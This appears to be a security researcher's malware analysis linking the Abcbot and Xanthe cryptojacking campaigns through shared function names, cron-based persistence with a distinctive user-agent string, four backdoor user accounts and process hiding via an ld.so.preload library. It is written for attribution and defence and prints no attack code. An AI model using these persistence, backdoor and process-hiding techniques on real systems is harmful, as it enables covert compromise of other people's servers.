Abcbot – An Evolution of Xanthe

There are a few infrastructure overlaps. For example, the following rule allowing ingress traffic from 64[.]225[.]46[.]44 in the Xanthe sample also appears in the Abcbot sample.
Whilst it’s common to see cryptojacking malware authors simply copy code from each other, there are a number of other similarities discussed below which make a direct link in ownership between the Xanthe and Abcbot campaigns more likely.

In the original report from Cisco’s Talos security research team, researchers commented on the coding style of the shell scripts being analysed – in particular, functions being declared at the top of the file and then invoked in some of the later lines.
Talos researchers suggested that this likely aids testing of new iterations, with functionality enabled/disabled through commenting of the lines responsible for function invocation.
Both the Abcbot and Xanthe samples we compared follow this coding style.

Linking these two samples based on code style similarities alone would be tenuous, at best. However, if we look at some of the function names themselves, correlation becomes apparent.
Several of the functions have “go” appended to the end of the function name and some functions have identical names. The following names appear in both samples:

nameservercheck
croncheckgo
checkrc
iptableschecker
filerungo

Comparing the above, we can immediately see that the Abcbot version of the nameservercheck function is significantly larger than the Xanthe counterpart.
The Xanthe sample we analyzed is older than the Abcbot sample by over a year (according to VirusTotal submissions).
This could indicate that the Abcbot version of the function has been iterated on several times, with new functionality added at each iteration.

The croncheckgo function in both samples is responsible for achieving persistence via the cron scheduling utility common to most Linux distributions.
Both samples include a TODO comment from the author, regarding adding logic to determine whether cron is running on different Linux distributions – a note to add logic presumably to deal with this.
The service command is then used to start the cron daemon and cron itself, guaranteeing that any modifications made to the crontab would be honoured by the scheduling utility.
The cron entries consist of curl commands with specified user-agent strings.
The purpose of this is covered in Talos’ research but if we look at the strings themselves, we can see that fczyo-cron is used in both samples, with different version numbers appended to each. Incidentally, one of the payloads downloaded by Xanthe is also named “fczyo”.

Reuse of a unique string such as this does seem more than coincidental and suggests that the code running on servers from both the Xanthe and Abcbot campaigns expects this string to be present in the user-agent.

Talos researchers noted that the method of propagation utilized by Xanthe was via enumeration of the known_hosts file, allowing the malware to spread to new hosts based on hosts the current host had previously connected to.

Our research of Abcbot showed examples of code used to add four malicious users to the compromised host, effectively creating four backdoors for the actor to utilize. The malicious usernames in question were:

logger
sysall
system
autoupdater
In the Xanthe sample, users with the same usernames are added to the system (if they do not already exist).
Similarly, both Abcbot and Xanthe search for and remove users that we assumed were from competing campaigns.

As researchers at Talos reported, perhaps one of the defining features of Xanthe was the use of an open source process hiding library named libprocesshider.so. This was used to hide the process created by the XMRig miner by inserting the path to the library into the /etc/ld.so.preload file.

We did not see evidence of this process hiding technique in the Abcbot sample we analyzed. We did, however, see some code that references use of the technique in previous campaigns (such as Xanthe) in the function kill_miner_proc; a function responsible for clearing artifacts of miners from competing or prior campaigns.